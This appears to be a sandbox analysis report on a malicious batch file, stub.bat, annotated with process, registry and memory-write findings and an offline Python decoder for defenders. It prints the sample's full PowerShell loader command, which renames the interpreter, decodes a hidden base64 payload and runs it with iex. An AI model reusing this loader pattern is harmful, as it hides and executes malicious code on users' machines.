Analysis
- max time kernel: 600s
- max time network: 440s
- platform: windows11-21h2_x64
- resource: win11-20240704-en
- resource tags: arch:x64, arch:x86, image:win11-20240704-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 08/07/2024, 15:19
Tasks
- Static task: static1
- Behavioral task behavioral1: sample stub.bat, resource win7-20240708-en
- Behavioral task behavioral2: sample stub.bat, resource win10v2004-20240708-en
- Behavioral task behavioral3: sample stub.bat, resource win11-20240704-en (the run reported on this page)
General
- Target: stub.bat
- Size: 3.4MB
- MD5: c27b8c9f05c86817d8d287f0d0bd8698
- SHA1: 239748a1871a85c7df6733bc24d9497a331aca87
- SHA256: cd6c05138680001d640a47ed988487797a4b77e95bff6c4f57ae57d294aa53e1
- SHA512: fbd18278c1d8c18360f16cf11db634162cb7e14484853496670ca074e06cbd26f5933b9cd22046063da3f86c294c786c20a00545baa8cbdc76a6af61c55c7bca
- SSDEEP: 49152:/mThC67EFbMUKiKknefnfIlTYhjwHs0j+VqdyvZWs6sT/Pj5wSe/XDX/DlbfZ5+m:n

A 3.4 MB batch file is itself a tell: the size is consistent with the base64 blob that the command line below reads from the last line of stub.bat and decodes, rather than with any plausible amount of batch logic.
Malware Config
Signatures
Blocklisted process makes network request (1 IoC)
- flow 1: PID 2296 powershell.exe
The Network section of this page did not extract, so the destination of flow 1 is not recoverable here.

Executes dropped EXE (1 IoC)
- PID 5052 $ktm-powershell.exe
Drops file in System32 directory (14 IoCs)
All 14 are attributed to WMIADAP.EXE (performance-counter refresh under wbem\Performance and PerfStringBackup) and to the EventLog svchost.exe (PID 1472) touching .evtx logs, not to the sample's chain (cmd.exe 3676 -> powershell.exe 2296 -> $ktm-powershell.exe 5052).
- File created C:\Windows\system32\PerfStringBackup.TMP (WMIADAP.EXE)
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx (svchost.exe)
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-DxgKrnl-Operational.evtx (svchost.exe)
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx (svchost.exe)
- File created C:\Windows\system32\perfh009.dat (WMIADAP.EXE)
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx (svchost.exe)
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-DxgKrnl-Admin.evtx (svchost.exe)
- File created C:\Windows\system32\perfc009.dat (WMIADAP.EXE)
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx (svchost.exe)
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx (svchost.exe)
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-TWinUI%4Operational.evtx (svchost.exe)
- File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini (WMIADAP.EXE)
- File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.h (WMIADAP.EXE)
- File opened for modification C:\Windows\system32\PerfStringBackup.INI (WMIADAP.EXE)

Drops file in Windows directory (4 IoCs)
All four are WMIADAP.EXE writing its counter definitions; same remark as above.
- File created C:\Windows\inf\WmiApRpl\WmiApRpl.h (WMIADAP.EXE)
- File opened for modification C:\Windows\inf\WmiApRpl\WmiApRpl.h (WMIADAP.EXE)
- File created C:\Windows\inf\WmiApRpl\WmiApRpl.ini (WMIADAP.EXE)
- File opened for modification C:\Windows\inf\WmiApRpl\WmiApRpl.ini (WMIADAP.EXE)

Command and Scripting Interpreter: PowerShell (1 IoC)
- PID 2296 powershell.exe
Checks SCSI registry key(s) (3 TTPs, 12 IoCs)
SCSI information is often read in order to detect sandboxing environments. In this run, however, the keys are read by svchost.exe (DsmSvc, PID 1072) and dwm.exe (PID 4168), not by the sample's chain, so this signature is environment noise here rather than evidence of anti-analysis by stub.bat. The vendor strings (QEMU DVD-ROM, a "DADY" disk) are what a sandbox-aware payload would find if it looked.
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 (svchost.exe)
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 (svchost.exe)
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 (svchost.exe)
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 (svchost.exe)
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 (svchost.exe)
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 (dwm.exe)
- Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags (dwm.exe)
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 (dwm.exe)
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 (svchost.exe)
- Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags (dwm.exe)
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 (svchost.exe)
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 (svchost.exe)

Enumerates system info in registry (2 TTPs, 2 IoCs)
Both reads are by dwm.exe (PID 4168), not by the sample.
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (dwm.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (dwm.exe)
Modifies data under HKEY_USERS (64 IoCs)
None of these come from the sample's chain; they are logon-session housekeeping by dwm.exe, LogonUI.exe, winlogon.exe, OfficeClickToRun.exe and the WinHttpAutoProxySvc svchost.exe. Duplicate entries (the same key created repeatedly by successive dwm.exe instances) are collapsed below.

dwm.exe, Key created (each repeated across the dwm.exe instances):
- \REGISTRY\USER\.DEFAULT\Software
- \REGISTRY\USER\.DEFAULT\Software\Microsoft
- \REGISTRY\USER\.DEFAULT\Software\Policies
- \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft
- \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates
- \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA
- \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust
- \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
- \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed
- \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates
- \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA
- \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust
- \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople
- \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed
- \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root
- \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
- \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache
- \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E
(The certificate-store and WinTrust keys are what CryptoAPI creates under a profile the first time a process in that session opens the user stores.)

LogonUI.exe:
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "172"
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"

winlogon.exe:
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\CLSID
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\Profile
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\KeyboardLayout = "0"
- Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\MachinePreferredUILanguages = 65006e002d005500530000000000 (UTF-16LE "en-US")

OfficeClickToRun.exe:
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe
- Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR
- Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"

svchost.exe (WinHttpAutoProxySvc, PID 3104):
- Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
Modifies registry class (2 IoCs)
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ (Explorer.EXE)
- Key created \REGISTRY\USER\S-1-5-21-1136334635-2482839916-910800802-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ (Explorer.EXE)
Suspicious behavior: EnumeratesProcesses (22 IoCs)
- PID 2296 powershell.exe (20 hits)
- PID 5052 $ktm-powershell.exe (2 hits)
Both hits are in the sample's chain; read them together with the WriteProcessMemory entries below, where the same PID 2296 touches nearly every process in the tree.

Suspicious behavior: LoadsDriver (64 IoCs)
All 64 entries are "Process not Found", i.e. the monitor could not attribute the driver-load event to a tracked process. PIDs as recorded: 2088, 2608, 1708, 3148, 1832, 5088, 652, 3080, 4580, 3228, 1360, 1276, 1336, 2508, 4752, 3860, 5108, 2208, 1304, 2908, 2924, 3056, 1628, 4740, 4312, 3476, 2076, 1484, 1076, 4760, 4408, 4736, 2784, 772, 2860, 388, 3280, 3764, 964, 2920, 4940, 3684, 952, 728, 1188, 2704, 1436, 3272, 1204, 2256, 392, 4448, 352, 2368, 1808, 3824, 968, 720, 4496, 1856, 3452, 5076, 2200, 1724. None of them is a PID from the sample's chain, so this signature says nothing about stub.bat.
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Grouped by process:
- PID 2296 powershell.exe: SeDebugPrivilege (3 entries)
- PID 5052 $ktm-powershell.exe: SeDebugPrivilege
- dwm.exe, PIDs 4168, 2440, 4804, 1820, 2412, 3688, 2784, 1468: SeCreateGlobalPrivilege, SeChangeNotifyPrivilege, 33, SeIncBasePriorityPrivilege (one set per instance; "33" is the privilege LUID the monitor could not name)
- PID 3396 Explorer.EXE: SeShutdownPrivilege and SeCreatePagefilePrivilege, repeated in pairs throughout the run
The dwm.exe and Explorer.EXE entries are normal desktop activity. The one that matters is SeDebugPrivilege in both powershell.exe 2296 and the dropped $ktm-powershell.exe 5052: that is the privilege needed to open other users' and system processes for the cross-process writes recorded below.
Suspicious use of FindShellTrayWindow (2 IoCs)
- PID 3396 Explorer.EXE (2 hits)

Suspicious use of SendNotifyMessage (28 IoCs)
- PID 3396 Explorer.EXE (28 hits)

Suspicious use of SetWindowsHookEx (2 IoCs)
- PID 1432 LogonUI.exe
- PID 3396 Explorer.EXE
Suspicious use of WriteProcessMemory (64 IoCs)
Grouped by writing process (target PIDs in the order recorded):
- PID 3676 cmd.exe -> 2296 (powershell.exe; 2 entries, the process start)
- PID 2296 powershell.exe -> 644 (winlogon.exe), 700 (lsass.exe), 1004, 548 (dwm.exe), 780, 684, 1044, 1064, 1196, 1244, 1284, 1340, 1420, 1472, 1524, 1580, 1600, 1684, 1748, 1796, 1868, 1900, 5052 ($ktm-powershell.exe; 2 entries, the process start), 1960, 1968, 1652, 1944, 2164 (spoolsv.exe), 2312, 2400, 2564, 2572, 2600, 2628 (sysmon.exe), 2728, 2736, 2748, 4168 (dwm.exe), 2756, 2896 (sihost.exe), 2992, 3160 (unsecapp.exe), 3396 (Explorer.EXE), 2440 (dwm.exe), 3556, 3572, 3984 (RuntimeBroker.exe), 4804 (dwm.exe); unlabelled PIDs are svchost.exe service hosts, see the process list
- PID 700 lsass.exe -> 2628 (sysmon.exe; 7 entries)
- PID 644 winlogon.exe -> 4168, 2440, 4804 (dwm.exe instances; 2 entries each)
Within the sample's chain the parent-to-child writes (cmd.exe -> powershell.exe, powershell.exe -> $ktm-powershell.exe) are ordinary process creation. What stands out is powershell.exe 2296 writing into the memory of nearly every other process in the tree, including lsass.exe, winlogon.exe and the image's sysmon.exe, while holding SeDebugPrivilege. The loader script that drives this is not on the page, so what is written cannot be determined here; recovering it from the last line of stub.bat is the next step.
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times. The report attaches no IoC to this signature, so it is not attributed to a specific process here.
Processes
Tree as recorded by the sandbox: root processes at the left, children indented; each entry gives PID and command line, with the image path in parentheses where it differs from the command line, then the signatures attached to it. PIDs are reused during the run: 2296 is both powershell.exe and a later StartMenuExperienceHost.exe, and the smss.exe entries at the end carry PIDs that also belong to dwm.exe, cmd.exe, Explorer.EXE and LogonUI.exe, so correlate on name plus PID, not PID alone. The sample's own chain is Explorer.EXE 3396 -> cmd.exe 3676 -> powershell.exe 2296 -> $ktm-powershell.exe 5052; the rest are system processes already running in the image.

- PID 644  winlogon.exe  (image C:\Windows\system32\winlogon.exe)
  signatures: Modifies data under HKEY_USERS; Suspicious use of WriteProcessMemory
  - PID 548  "dwm.exe"  (image C:\Windows\system32\dwm.exe)
  - PID 4168  "dwm.exe"  (image C:\Windows\system32\dwm.exe)
    signatures: Checks SCSI registry key(s); Enumerates system info in registry; Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
  - PID 2440  "dwm.exe"  (image C:\Windows\system32\dwm.exe)
    signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
  - PID 4804  "dwm.exe"  (image C:\Windows\system32\dwm.exe)
    signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
  - PID 1820  "dwm.exe"  (image C:\Windows\system32\dwm.exe)
    signatures: Suspicious use of AdjustPrivilegeToken
  - PID 2412  "dwm.exe"  (image C:\Windows\system32\dwm.exe)
    signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
  - PID 3688  "dwm.exe"  (image C:\Windows\system32\dwm.exe)
    signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
  - PID 2784  "dwm.exe"  (image C:\Windows\system32\dwm.exe)
    signatures: Suspicious use of AdjustPrivilegeToken
  - PID 1468  "dwm.exe"  (image C:\Windows\system32\dwm.exe)
    signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
  - PID 1432  "LogonUI.exe" /flags:0x0 /state0:0xa3a15855 /state1:0x41c64e6d  (image C:\Windows\system32\LogonUI.exe)
    signatures: Modifies data under HKEY_USERS; Suspicious use of SetWindowsHookEx
- PID 700  C:\Windows\system32\lsass.exe
  signatures: Suspicious use of WriteProcessMemory
- PID 1004  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- PID 780  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- PID 684  C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- PID 1044  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- PID 1064  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- PID 1196  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- PID 1244  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
- PID 1284  C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
- PID 1340  C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- PID 1420  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
- PID 1472  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  signatures: Drops file in System32 directory
- PID 1524  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  - PID 2896  sihost.exe  (image C:\Windows\system32\sihost.exe)
- PID 1580  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
- PID 1600  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
- PID 1684  C:\Windows\system32\svchost.exe -k NetworkService -p
- PID 1748  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
- PID 1796  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
- PID 1868  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
- PID 1900  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
  - PID 928  C:\Windows\system32\AUDIODG.EXE 0x00000000000004C0 0x00000000000004E0
- PID 1960  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- PID 1968  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
- PID 1652  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
- PID 1944  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
- PID 2164  C:\Windows\System32\spoolsv.exe
- PID 2312  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
- PID 2400  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
- PID 2564  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
- PID 2572  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
- PID 2600  C:\Windows\system32\svchost.exe -k NetworkService -p
- PID 2628  C:\Windows\sysmon.exe
- PID 2728  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
- PID 2736  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
  - PID 4832  wmiadap.exe /R /T  (image C:\Windows\system32\wbem\WMIADAP.EXE)
    signatures: Drops file in System32 directory; Drops file in Windows directory
- PID 2748  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
- PID 2756  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
- PID 2992  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- PID 3160  C:\Windows\system32\wbem\unsecapp.exe -Embedding
- PID 3396  C:\Windows\Explorer.EXE
  signatures: Modifies registry class; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of SetWindowsHookEx
  - PID 3676  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\stub.bat"
    signatures: Suspicious use of WriteProcessMemory
    - PID 2296  (image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
      powershell -command "Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $env:LOCALAPPDATA\`$ktm-powershell.exe; $data = Get-Content -Path 'C:\Users\Admin\AppData\Local\Temp\stub.bat'; $lines = $data -split '\n';$last_line = $lines[-1]; $last_line = [Convert]::FromBase64String($last_line.Replace('\n', '')); $last_line = [System.Text.Encoding]::Unicode.GetString($last_line); [System.IO.File]::WriteAllText($env:LOCALAPPDATA + '\\$ktm-loader.ps1', $last_line); $last_line | iex"
      signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - PID 5052  "C:\Users\Admin\AppData\Local\$ktm-powershell.exe" -ep bypass -ec <encoded command not captured on this page>
        signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

What the sample's chain does, as recorded: cmd.exe runs stub.bat, which launches powershell.exe with an inline command that (1) copies the real powershell.exe to %LOCALAPPDATA%\$ktm-powershell.exe, a renamed interpreter that sidesteps detections keyed on the image name powershell.exe; (2) reads stub.bat itself, takes its last line, base64-decodes it and interprets the bytes as UTF-16LE ([System.Text.Encoding]::Unicode); (3) writes the result to %LOCALAPPDATA%\$ktm-loader.ps1 and pipes the same text to Invoke-Expression (iex). The renamed copy is then started with -ep bypass -ec, i.e. an encoded command, which is the payload this page does not show. Two details matter for anyone writing an extractor or a rule: the backtick before $ktm in the -Destination argument stops PowerShell expanding $ktm as a variable, so the file really is named $ktm-powershell.exe; and Get-Content already returns one string per line, so the -split '\n' and .Replace('\n', '') steps are effectively no-ops and the payload is simply the last line of the batch file. Detection should key on the behaviour (Copy-Item of powershell.exe to a user-writable path, FromBase64String on the script's own file, iex), not on the $ktm- prefix, which is trivially changed.
- PID 3556  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
- PID 3572  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
- PID 3984  C:\Windows\System32\RuntimeBroker.exe -Embedding
- PID 4072  C:\Windows\System32\RuntimeBroker.exe -Embedding
- PID 3600  C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
- PID 4132  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- PID 4464  C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
- PID 4572  C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
- PID 4972  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
- PID 3188  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
- PID 3352  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
- PID 3104  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  signatures: Modifies data under HKEY_USERS
- PID 1500  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  signatures: Modifies data under HKEY_USERS
- PID 2988  C:\Windows\system32\SppExtComObj.exe -Embedding
- PID 4540  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
- PID 3536  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- PID 1664  C:\Windows\System32\svchost.exe -k WerSvcGroup
- PID 1072  C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
  signatures: Checks SCSI registry key(s)
- PID 2296  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca  (PID reused after powershell.exe 2296 exited)
- smss.exe session launches (image C:\Windows\System32\smss.exe; command line \SystemRoot\System32\smss.exe followed by two handle values):
  - PID 3248  00000144 0000008c
  - PID 1820  000000f0 0000008c
  - PID 796  00000124 0000008c
  - PID 4804  000000f4 0000008c
  - PID 2440  00000120 0000008c
  - PID 3676  000000f8 0000008c
  - PID 668  000001b4 0000008c
  - PID 1016  000001b8 0000008c
  - PID 3688  0000018c 0000008c
  - PID 2784  00000124 0000008c
  - PID 3396  00000120 0000008c
  - PID 1432  00000168 0000008c
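The decode steps in the powershell.exe 2296 command line, reproduced as an added offline extractor. This is the editor's example, not code from the sample, from tria.ge or from any project. It takes a batch file shaped like stub.bat, recovers the loader script from the last line exactly as the recorded command does (base64, then UTF-16LE), decodes a PowerShell -EncodedCommand argument of the kind $ktm-powershell.exe 5052 was started with, and applies a behaviour-based triage check to the recorded command line. The stub.bat and loader text embedded in the block are constructed stand-ins; the real last line of stub.bat and the real -ec argument are not on this page. Function names and the heuristic are assumptions of this example.

```python
"""Offline decoder for the stub.bat loader pattern recorded in this report.

Added example; not code from the sample, from tria.ge or from any project.
It reproduces, without executing anything, the two decode steps the recorded
command lines perform:

  1. powershell.exe (PID 2296) reads stub.bat, takes its LAST line,
     base64-decodes it and interprets the bytes as UTF-16LE; that text was
     written to $env:LOCALAPPDATA\$ktm-loader.ps1 and piped to iex.
  2. the renamed copy ($ktm-powershell.exe, PID 5052) is started with
     "-ep bypass -ec <base64>", PowerShell's -EncodedCommand form, which is
     likewise base64 of UTF-16LE text.

The batch file and loader text below are CONSTRUCTED stand-ins; the real
payloads are not on this page.  All function names are this example's own.
"""
import base64
import re
from typing import Optional

# Command line recorded on the page for PID 2296 (verbatim, raw string).
RECORDED_CMDLINE = r'''powershell -command "Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $env:LOCALAPPDATA\`$ktm-powershell.exe; $data = Get-Content -Path 'C:\Users\Admin\AppData\Local\Temp\stub.bat'; $lines = $data -split '\n';$last_line = $lines[-1]; $last_line = [Convert]::FromBase64String($last_line.Replace('\n', '')); $last_line = [System.Text.Encoding]::Unicode.GetString($last_line); [System.IO.File]::WriteAllText($env:LOCALAPPDATA + '\\$ktm-loader.ps1', $last_line); $last_line | iex"'''


def encode_utf16le_b64(text: str) -> str:
    """Inverse of the decode step; used here only to build constructed test data."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_utf16le_b64(b64text: str) -> str:
    """[Convert]::FromBase64String followed by [Text.Encoding]::Unicode.GetString."""
    raw = base64.b64decode(b64text.strip(), validate=True)
    return raw.decode("utf-16-le")


def extract_last_line_payload(bat_text: str) -> str:
    """Recover the loader script powershell.exe built from stub.bat.

    Get-Content returns one string per line, so the sample's -split/.Replace
    steps are no-ops: the payload is simply the file's last non-empty line.
    CRLF endings and a trailing newline are tolerated here.
    """
    lines = [ln.rstrip("\r") for ln in bat_text.split("\n")]
    lines = [ln for ln in lines if ln.strip()]
    if not lines:
        raise ValueError("empty batch file")
    return decode_utf16le_b64(lines[-1])


# -ec / -enc / -EncodedCommand followed by a base64 token, any case.
_EC_RE = re.compile(r"(?:-ec|-enc|-encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand argument from a command line, or None."""
    m = _EC_RE.search(cmdline)
    return decode_utf16le_b64(m.group(1)) if m else None


def looks_like_renamed_interpreter_loader(cmdline: str) -> bool:
    """Triage heuristic (this example's own) for the pattern in this report:
    copy powershell.exe under a new name, base64-decode the caller's own file,
    pipe the result to Invoke-Expression.  Keys on behaviour, not on $ktm-."""
    c = cmdline.lower()
    return ("copy-item" in c and "powershell.exe" in c
            and "frombase64string" in c
            and ("| iex" in c or "invoke-expression" in c))


# Constructed stand-in for stub.bat: harmless loader text, encoded the same way
# the real file must have been for the recorded command to work.
FAKE_LOADER_PS1 = "Write-Output 'placeholder loader'\n$x = 1 + 1\n"
FAKE_STUB_BAT = ("@echo off\r\n"
                 "rem constructed sample, not the real stub.bat\r\n"
                 + encode_utf16le_b64(FAKE_LOADER_PS1) + "\r\n")

if __name__ == "__main__":
    print(extract_last_line_payload(FAKE_STUB_BAT))
    print(looks_like_renamed_interpreter_loader(RECORDED_CMDLINE))
```

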